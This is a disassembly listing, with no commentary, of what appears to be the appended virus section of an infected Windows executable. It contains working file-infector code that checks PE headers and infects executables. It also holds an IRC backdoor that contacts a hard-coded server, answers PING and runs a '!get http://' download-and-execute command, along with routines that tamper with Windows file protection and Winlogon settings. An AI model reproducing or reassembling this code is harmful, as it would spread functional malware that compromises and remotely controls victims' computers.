		pop	ecx
		call	dword ptr [ebp+402407h]
		test	edi, edi
		jz	short loc_49089E
		mov	ecx, dword ptr ss:loc_401488[ebp]
		jecxz	short loc_490867
		lea	edx, sub_401000[ebp]
		add	edx, ecx
		push	edi
		push	ebx
		call	edx

loc_490867:				; CODE XREF: p9xindpz:00490859j
		mov	eax, [ebp+402497h]
		lea	ecx, [edi+1379h]
		call	sub_4907D0
		mov	eax, [ebp+40249Bh]
		lea	ecx, [edi+13C6h]
		call	sub_4907D0
		mov	eax, [ebp+40249Fh]
		test	eax, eax
		jz	short loc_49089E
		lea	ecx, [edi+13D3h]
		call	sub_4907D0

loc_49089E:				; CODE XREF: p9xindpz:0049081Dj
					; p9xindpz:00490851j ...
		mov	eax, edi
		pop	edi
		retn
; ---------------------------------------------------------------------------
		push	ebp
		call	$+5
		pop	ebp
		sub	ebp, 4018A8h
		xor	ecx, ecx
		lea	eax, [ebp+401C3Eh]
		push	ecx
		push	esp
		push	ecx
		push	ecx
		push	eax
		push	ecx
		push	ecx
		call	dword ptr ss:loc_402437[ebp]
		xchg	eax, [esp]
		call	dword ptr [ebp+402407h]
		pop	ebp
		retn	4
; ---------------------------------------------------------------------------
		db 55h,	0E8h, 0
		dd 5D000000h, 18D7ED81h, 0FF6A0040h, 18A2958Dh,	52500040h
		dd 2420CDh, 0C483002Ah,	85C7660Ch, 4018E8h, 85C720CDh
		dd 4018EAh, 2A0024h, 16AC35Dh, 33FF016Ah, 0FF0473FFh, 74C08515h
		dd 0B68F0h, 0D08B0000h,	3C50035Bh, 1906B58Dh, 0BA8B0040h
		dd 10Ch, 1088A8Bh, 0F8030000h, 8B60CB2Bh, 61A6F3CBh, 0E2470574h
		dd 83C2EBF5h, 8B570FC7h, 0CC8B53D4h, 406A5450h,	0FF6A5251h
		dd 24AB95FFh, 0C4830040h, 3F958B0Ch, 2B004024h,	7EA83D7h
		dd 6A07C7h, 578900E8h, 9569C303h, 402501h, 8088405h, 0B042C033h
		dd 195891Ah, 0F7004025h, 61428DE2h, 75C9FEAAh, 0E855C3E1h
		dd 0
; ---------------------------------------------------------------------------
		pop	ebp
		sub	ebp, 401998h
		mov	ebx, dword ptr ss:loc_402505[ebp]
		cmp	dword ptr [esp+8], 0
		jz	loc_490A69
		sub	esp, 208h
		push	esp
		push	104h
		call	dword ptr [ebp+402457h]
		mov	edi, esp
		lea	eax, [esp+104h]
		push	eax
		push	0
		call	near ptr loc_4909D6+1
		push	esi
		push	edx
		push	esp

loc_4909D6:				; CODE XREF: p9xindpz:004909CEp
		add	[edi-1], dl
		xchg	eax, ebp
		push	ebx
		and	al, 40h
		add	[ebx], dh
		leave
		lea	edx, [edi+104h]
		push	ecx
		push	ecx
		push	2
		push	ecx
		push	1
		push	40000000h
		push	edx
		call	dword ptr ss:loc_402427[ebp]
		xchg	eax, esi
		test	esi, esi
		jz	short loc_490A59

loc_4909FE:				; CODE XREF: p9xindpz:00490A2Cj
		push	eax
		push	esp
		push	104h
		push	edi
		push	dword ptr [esp+220h]
		call	dword ptr [ebp+4024E3h]
		pop	ecx
		test	eax, eax
		jz	short loc_490A2E
		jecxz	short loc_490A2E
		push	eax
		mov	edx, esp
		push	0
		push	edx
		push	ecx
		push	edi
		push	esi
		call	dword ptr ss:loc_40248F[ebp]
		pop	ecx
		test	eax, eax
		jnz	short loc_4909FE

loc_490A2E:				; CODE XREF: p9xindpz:00490A16j
					; p9xindpz:00490A18j
		push	esi
		call	dword ptr [ebp+402407h]
		lea	edx, [edi+44h]
		push	edx
		push	edi
		push	44h
		pop	eax
		lea	edx, [edi+104h]
		stosd
		xor	eax, eax
		push	10h
		pop	ecx
		rep stosd
		push	eax
		push	eax
		push	eax
		push	eax
		push	eax
		push	eax
		push	eax
		push	edx
		call	dword ptr ss:loc_40242F[ebp]

loc_490A59:				; CODE XREF: p9xindpz:004909FCj
		add	esp, 208h
		push	dword ptr [esp+8]
		call	dword ptr [ebp+4024D3h]

loc_490A69:				; CODE XREF: p9xindpz:004909AAj
		push	ebx
		call	dword ptr [ebp+4024D3h]
		pop	ebp
		retn	4
; ---------------------------------------------------------------------------
		cmp	byte ptr [esi],	0Ah
		jnz	short loc_490A7A
		inc	esi

loc_490A7A:				; CODE XREF: p9xindpz:00490A77j
		mov	ecx, [ebp+401484h]
		jecxz	short loc_490A9B
		lea	edx, sub_401000[ebp]
		add	edx, ecx
		push	esi
		call	edx
		test	al, al
		js	loc_490BB4
		jz	loc_490BAB

loc_490A9B:				; CODE XREF: p9xindpz:00490A80j
		cmp	byte ptr [esi],	3Ah
		jnz	short loc_490AB0

loc_490AA0:				; CODE XREF: p9xindpz:00490AADj
		inc	esi
		cmp	byte ptr [esi],	0
		jz	loc_490BAB
		cmp	byte ptr [esi],	20h
		jnz	short loc_490AA0
		inc	esi

loc_490AB0:				; CODE XREF: p9xindpz:00490A9Ej
		cmp	dword ptr [esi], 474E4950h
		jnz	short loc_490AFA
		mov	ecx, edi
		mov	byte ptr [esi+1], 4Fh
		sub	ecx, esi
		push	ecx
		push	0
		push	ecx
		push	esi
		push	ebx
		call	dword ptr ss:loc_4024CB[ebp]
		pop	ecx
		cmp	eax, ecx
		jnz	loc_490BB4
		lea	eax, [ebp+401C32h]
		push	0
		push	0Ch
		push	eax
		push	ebx
		call	dword ptr ss:loc_4024CB[ebp]
		cmp	eax, 0Ch
		jnz	loc_490BB4
		jmp	loc_490BAB
; ---------------------------------------------------------------------------

loc_490AFA:				; CODE XREF: p9xindpz:00490AB6j
		cmp	dword ptr [esi], 56495250h
		jnz	loc_490BAB
		add	esi, 8

loc_490B09:				; CODE XREF: p9xindpz:00490B14j
		lodsb
		cmp	al, 0Dh
		jz	loc_490BAB
		cmp	al, 20h
		jnz	short loc_490B09
		lodsb
		cmp	al, 3Ah
		jnz	loc_490BAB
		lodsd
		or	eax, 20202020h
		cmp	eax, 74656721h
		jnz	short loc_490BAB
		lodsb
		cmp	al, 20h
		jnz	short loc_490BAD
		cmp	dword ptr [esi-1], 74746820h
		jnz	short loc_490BAB
		cmp	dword ptr [esi+3], 2F2F3A70h
		jnz	short loc_490BAB
		mov	byte ptr [edi-1], 0
		rdtsc
		mov	edx, 2710h
		mul	edx
		push	edx
		call	dword ptr [ebp+402483h]
		xor	eax, eax
		push	eax
		push	eax
		push	eax
		push	eax
		call	near ptr loc_490B69+2
		inc	esp
		outsd
		ja	short loc_490BD4
		insb
		outsd
		popa

loc_490B69:				; CODE XREF: p9xindpz:00490B5Dp
		db	64h
		add	bh, bh
		xchg	eax, ebp
; ---------------------------------------------------------------------------
		dd offset loc_4024DB
; ---------------------------------------------------------------------------
		test	eax, eax
		jz	short loc_490BAB
		xor	ecx, ecx
		mov	dword ptr ss:loc_402505[ebp], eax
		push	ecx
		push	80000200h
		push	ecx
		push	ecx
		push	esi
		push	eax
		call	dword ptr ss:loc_4024DF[ebp]
		lea	edx, loc_401992[ebp]
		push	eax
		xor	ecx, ecx
		push	esp
		push	ecx
		push	eax
		push	edx
		push	ecx
		push	ecx
		call	dword ptr ss:loc_402437[ebp]
		xchg	eax, [esp]
		call	dword ptr [ebp+402407h]

loc_490BAB:				; CODE XREF: p9xindpz:00490A95j
					; p9xindpz:00490AA4j ...
		clc
		retn
; ---------------------------------------------------------------------------

loc_490BAD:				; CODE XREF: p9xindpz:00490B2Fj
		or	byte ptr [ebp+401477h],	1

loc_490BB4:				; CODE XREF: p9xindpz:00490A8Fj
					; p9xindpz:00490ACFj ...
		stc
		retn
; ---------------------------------------------------------------------------
		dw 4F53h
		dd 41575446h, 4D5C4552h, 6F726369h, 74666F73h, 6E69575Ch
		dd 73776F64h, 7275435Ch
; ---------------------------------------------------------------------------

loc_490BD4:				; CODE XREF: p9xindpz:00490B64j
		jb	short near ptr loc_490C3A+1
		outsb
		jz	short loc_490C2F
		db	65h
		jb	short near ptr loc_490C4B+4
		imul	ebp, [edi+6Eh],	7078455Ch
		insb
		outsd
		jb	short near ptr loc_490C4B+1
		jb	short $+2
		push	ebp
		outsb
		imul	esi, [ecx+75h],	736F4865h
		jz	short $+2
		add	al, [eax]
		push	eax
; ---------------------------------------------------------------------------
		dd 0
aProxima_ircgal	db 'proxima.ircgalaxy.pl',0
		db 4Eh,	49h, 43h
		dd 7769204Bh, 736A6779h, 550A6C62h, 20524553h, 30323069h
		dd 20313035h
; ---------------------------------------------------------------------------
		and	cs:[esi], ch

loc_490C2F:				; CODE XREF: p9xindpz:00490BD7j
		and	[edx], bh
		pop	edi
		dec	edx
		dec	edi
		dec	ecx
		dec	esi
		and	[esi], ah
		jbe	short near ptr loc_490CA2+1

loc_490C3A:				; CODE XREF: p9xindpz:loc_490BD4j
		jb	short near ptr loc_490CAF+1
		jnz	short near ptr loc_490C45+3
		push	ebp
		call	$+5
		pop	ebp

loc_490C45:				; CODE XREF: p9xindpz:00490C3Cj
		sub	ebp, offset loc_401C44

loc_490C4B:				; CODE XREF: p9xindpz:00490BE5j
					; p9xindpz:00490BD9j
		mov	byte ptr [ebp+401477h],	0
		call	ss:dword_40245B[ebp]
		shr	eax, 1Fh
		jz	short loc_490C99
		push	1Eh
		mov	esi, [ebp+40241Bh]
		pop	ecx

loc_490C66:				; CODE XREF: p9xindpz:loc_490C95j
		lodsb
		cmp	al, 2Eh
		jnz	short loc_490C95
		cmp	word ptr [esi],	1DFFh
		jnz	short loc_490C95
		lea	edi, [ebp+4024FBh]
		mov	esi, [esi+2]
		push	edi
		movsd
		movsw
		lea	eax, [ebp+40234Fh]
		pop	dword ptr [ebp+402375h]
		cli
		mov	[esi-6], eax
		mov	word ptr [esi-2], cs
		sti
		mov	cl, 1

loc_490C95:				; CODE XREF: p9xindpz:00490C69j
					; p9xindpz:00490C70j
		loop	loc_490C66
		jmp	short loc_490CDC
; ---------------------------------------------------------------------------

loc_490C99:				; CODE XREF: p9xindpz:00490C5Bj
		lea	eax, dword_40149F[ebp]
		push	eax
		push	0

loc_490CA2:				; CODE XREF: p9xindpz:00490C38j
		push	6
		call	ss:dword_40246B[ebp]
		cmp	dword ptr [esp+8], 4

loc_490CAF:				; CODE XREF: p9xindpz:loc_490C3Aj
		jnz	short loc_490CDC
		call	near ptr loc_490CB9+1
		push	ebx
		inc	esi
		inc	ebx

loc_490CB9:				; CODE XREF: p9xindpz:00490CB1p
		add	bh, bh
		xchg	eax, ebp
		dec	edi
		and	al, 40h
		add	al, ch
		dec	esp
		cld
; ---------------------------------------------------------------------------
		db 0FFh
		dd 7E8FFh, 46530000h, 534F5F43h, 4F95FF00h, 0E8004024h
		dd 0FFFFFC35h
; ---------------------------------------------------------------------------

loc_490CDC:				; CODE XREF: p9xindpz:00490C97j
					; p9xindpz:loc_490CAFj
		call	sub_49012A
		dec	dword ptr [ebp+401262h]
		call	near ptr loc_490CF6+1
		push	ebp
		push	ebx
		inc	ebp
		push	edx
		xor	esi, [edx]
		db	2Eh
		inc	esp
		dec	esp
		dec	esp

loc_490CF6:				; CODE XREF: p9xindpz:00490CE7p
		add	bh, bh
		xchg	eax, ebp
		arpl	[eax+eax*2], sp
		add	al, ch
		or	al, [eax]
; ---------------------------------------------------------------------------
		dd 73770000h, 6E697270h, 416674h, 1395FF50h, 89004024h
		dd 40241F85h, 8D310F00h, 4017898Dh, 1858900h, 51004025h
		dd 246395FFh, 68930040h, 4, 1796B58Dh, 8D590040h, 4024E7BDh
		dd 0F746E800h, 0C766FFFFh, 401BF685h, 83F0FF00h, 401BF8A5h
		dd 958D0000h, 401BB6h, 16A5450h, 6852006Ah, 80000002h
		dd 24EB95FFh, 0C0850040h, 8D22755Ah, 401BE98Dh,	66A5200h
		dd 1BF6B58Dh, 56540040h, 52515050h, 24EF95FFh, 0FF580040h
		dd 4024E795h, 885C600h,	4027h, 0CE8h, 4F535700h, 32334B43h
		dd 4C4C442Eh, 6395FF00h, 93004024h, 768h, 0EDB58D00h, 59004016h
		dd 24B7BD8Dh, 0C1E80040h, 0E8FFFFF6h, 0Ch, 494E4957h, 2E54454Eh
		dd 4C4C44h, 246395FFh, 0C0850040h, 1E7840Fh, 68930000h
		dd 5, 172BB58Dh, 8D590040h, 4024D3BDh, 0F68AE800h, 0BD83FFFFh
		dd 4024D7h, 0C2840F00h,	81000001h, 190ECh, 1685400h, 0FF000001h
		dd 4024B795h, 90C48100h, 50000001h, 6AD48Bh, 0D795FF52h
		dd 85004024h, 0D7559C0h, 138868h, 8395FF00h, 0EB004024h
		dd 0F8BD83E2h, 401Bh, 858D2975h, 401BFCh, 0C395FF50h, 85004024h
		dd 3B840FC0h, 8B000001h, 8B0C40h, 858F30FFh, 401BF8h, 270885C6h
		dd 6A010040h, 6A016A00h, 0CF95FF02h, 83004024h,	840FFFF8h
		dd 112h, 0F4958D93h, 6A00401Bh,	0FF535210h, 4024BF95h
		dd 0FC08500h, 0F285h, 16BD8D00h, 0B100401Ch, 0FAC0E808h
		dd 9468FFFFh, 5E000000h, 3489E62Bh, 95FF5424h, 40245Fh
		dd 1C24BD8Dh, 1B10040h,	0FFFAA1E8h, 24448BFFh, 8E0C110h
		dd 424440Bh, 0B08E0C1h,	50082444h, 5E8h, 362E2500h, 0FF570078h
		dd 40241F95h, 0CC48300h, 200647C6h, 1C11958Dh, 6A0040h
		dd 2168h, 0FF535200h, 4024CB95h, 247C8D00h, 95FF5714h
		dd 402423h, 0A3804C6h, 50006A40h, 95FF5357h, 4024CBh, 0BD8DE603h
		dd 401C32h, 0C68006Ah, 57000000h, 0CB95FF53h, 3D004024h
		dd 0Ch,	0B58D4D75h, 402509h, 27088D8Dh,	0CE2B0040h, 5651006Ah
		dd 0C795FF53h, 83004024h, 2F7E00F8h, 8DFE8B91h,	402509B5h
		dd 0F20DB000h, 601075AEh, 0FFFAF7E8h, 177261FFh, 778D09E3h
		dd 8BEAEB01h, 8DCE2BCFh, 402509BDh, 87A4F300h, 53B9EBF7h
		dd 24BB95FFh, 0BD800040h, 401477h, 682A7401h, 7530h, 248395FFh
		dd 0BD800040h, 402708h,	0C7117400h, 401BF885h, 0
		dd 885C600h, 4027h, 0FFFE56E9h,	8085C7FFh, 4014h, 5D800000h
		dd 8D0004C2h, 402709B5h, 95FF5600h, 402443h, 0FFFF883h
		dd 0BB84h, 0D858900h, 6A004028h, 95FF5600h, 40247Bh, 840FC085h
		dd 0A4h, 5050C02Bh, 6A50036Ah, 6801h, 0FF56C000h, 40242795h
		dd 0FFF88300h, 2E4840Fh, 85890000h, 402811h, 28158D8Dh
		dd 958D0040h, 40281Dh, 6A5251h,	4B95FF50h, 83004024h, 840FFFF8h
		dd 2B2h, 0B5FF006Ah, 402811h, 244795FFh, 0F8830040h, 9B840FFFh
		dd 89000002h, 40282585h, 3C93300h, 515051C3h, 0FF51046Ah
		dd 402811B5h, 2B95FF00h, 85004024h, 77840FC0h, 33000002h
		dd 298589C9h, 51004028h, 1F685151h, 50000F00h, 246795FFh
		dd 0C0850040h, 230840Fh, 85890000h, 40282Dh, 384B8BC3h
		dd 5838B8h, 3D23300h, 0F7F1F7C1h, 358589E1h, 8B004028h
		dd 6B83C4Bh, 33000014h,	0F7C103D2h, 89E1F7F1h, 40283185h
		dd 0B70FC300h, 0E3F9064Bh, 18538D36h, 1443B70Fh, 6B49D003h
		dd 0D00328C1h, 775F3A81h, 74F96E69h, 7A83491Eh,	0DF72010Ch
		dd 8B3C4B8Bh, 42031442h, 48448D10h, 23D9F7FFh, 25853BC1h
		dd 0C3004028h, 24448B59h, 0B888890Ch, 33000000h, 0CF8BC3C0h
		dd 0BD8D0BEBh, 402709h,	33DF8BFCh, 613CACC9h, 7A3C0672h
		dd 202C0277h, 745C3CAAh, 742E3CECh, 75003CDDh, 8BC8E3E8h
		dd 58453D01h, 0B740045h, 5243533Dh, 49850F00h, 8BFFFFFFh
		dd 49573D03h, 840F434Eh, 0FFFFFF3Ch, 5543573Dh,	31840F4Eh
		dd 3DFFFFFFh, 32334357h, 0FF26840Fh, 503DFFFFh,	0F4F5453h
		dd 0FFFF1B84h, 0E8DB33FFh, 0FFFFFE43h, 0FF0E840Fh, 0D233FFFFh
		dd 16E8h, 0FF6EE800h, 0E8FFFFh,	5D000000h, 21B3ED81h, 0F9E90040h
		dd 64000000h, 0B58B32FFh, 40282Dh, 66228964h, 5A4D3E81h
		dd 0E2850Fh, 5E8B0000h,	66DE033Ch, 45503B81h, 0D2850Fh
		dd 43F70000h, 200016h, 0C5850F00h, 0F6000000h, 0F025C43h
		dd 0BB84h, 207E8100h, 20202020h, 0AE840Fh, 0CFE80000h
		dd 0FFFFFFEh, 0A382h, 0FE97E800h, 0A2E8FFFFh, 8B000000h
		dd 4028319Dh, 0FDB5E800h, 840FFFFFh, 88h, 282DB58Bh, 5E8B0040h
		dd 0E8DE033Ch, 0FFFFFE9Eh, 4A817672h, 6024h, 56FE8BE0h
		dd 8D147A03h, 401000B5h, 107A0300h, 501B9h, 0A5F35700h
		dd 2E303B1h, 5E5FA4F3h,	92310F52h, 155878Dh, 50880000h
		dd 0EECBE8FFh, 8B5AFFFFh, 4A030C4Ah, 5418D10h, 8928432Bh
		dd 46C71247h, 20202020h, 284B8920h, 8B104A8Bh, 40283185h
		dd 84A3900h, 4A890373h,	10420108h, 586383h, 2835858Bh
		dd 42010040h, 50430108h, 8B64D233h, 28F6422h, 11BD8358h
		dd 4028h, 0FDE2840Fh, 0B5FFFFFFh, 40282Dh, 248795FFh, 0B5FF0040h
		dd 402829h, 240795FFh, 8D8D0040h, 402815h, 281D958Dh, 52510040h
		dd 0B5FF006Ah, 402811h,	247F95FFh, 0B5FF0040h, 402811h
		dd 240795FFh, 0B58D0040h, 402709h, 280DB5FFh, 0FF560040h
		dd 40247B95h, 11A58300h, 4028h,	0E8C3h,	6A5D0000h, 2EED8101h
		dd 58004023h, 85C10FF0h, 401480h, 83C3C085h, 0FF0FFC8h
		dd 148085C1h, 3DC30040h, 2A0010h, 81661C75h, 6C0C247Ch
		dd 60137571h, 0FFFFC4E8h, 0E80575FFh, 0FFFFFDC2h, 0FFFFD2E8h
		dd 0FF2E61FFh, 3456782Dh, 0AAE86012h, 75FFFFFFh, 24448B39h
		dd 9B58D30h, 8B004027h,	81660850h, 7302063Ah, 685625h
		dd 8B00FF00h, 52006AC4h, 0B395FF50h, 83004024h,	3E8108C4h
		dd 5C3F3F5Ch, 0C6830375h, 0FD74E804h, 84E8FFFFh, 61FFFFFFh
		dd 25B8h, 2FB8C300h, 0E8000000h, 10h, 0B80020C2h, 30h
		dd 3E8h, 24C200h, 0C24548Dh, 0F8832ECDh, 60197C00h, 0E8h
		dd 24548B00h, 1A8B5D30h, 23F1ED81h, 4E80040h, 61FFFFF4h
		dd 630004C2h, 0DE77E779h, 7D77E737h, 0FD77F515h, 77E7A5h
		dd 2 dup(0)
		dd 72000000h, 3777E746h, 9777E7A8h, 0B877E777h,	8377E61Bh
		dd 3777E7AAh, 0E777E7ACh, 4977EBB1h, 0AB77E73Ch, 0EF77E74Ch
		dd 0E277E793h, 9377E73Ch, 8F77E79Fh, 3477E6AFh,	8677E6ADh
		dd 5777E7C4h, 0D877E7C6h, 7677E805h, 1577E74Dh,	0B777E7C8h
		dd 9577E706h, 0E977EBA5h, 9677EBA6h, 1A77E703h,	0E677E701h
		dd 9077E61Bh, 0A77E750h, 8C77E798h, 6377E79Dh, 377F7E4h
		dd 0A377F7E6h, 0B377F7E6h, 7377F7E6h, 6377F7EAh, 4377F7EBh
		dd 377F7ECh, 3377F7F5h,	77F526h, 5Dh dup(0)
		db 3 dup(0)
byte_49162F	db 0			; DATA XREF: sub_45877C-D7CAo
		dd 0D72h dup(0)
		db 3 dup(0)
byte_494BFB	db 0			; DATA XREF: sub_4448E2+4A6Eo
		align 2000h
p9xindpz	ends

; Section 9. (virtual address 00096000)
; Virtual size			: 00001000 (   4096.)
; Section size in file		: 00000200 (	512.)
; Offset to raw	data for section: 00096000
; Flags	C0000040: Data Readable	Writable
; Alignment	: default
; ===========================================================================

; Segment type:	Pure data
; Segment permissions: Read/Write
_idata2		segment	para public 'DATA' use32
		assume cs:_idata2
		;org 496000h
		dd 80h dup(0)
		align 1000h
_idata2		ends


		end start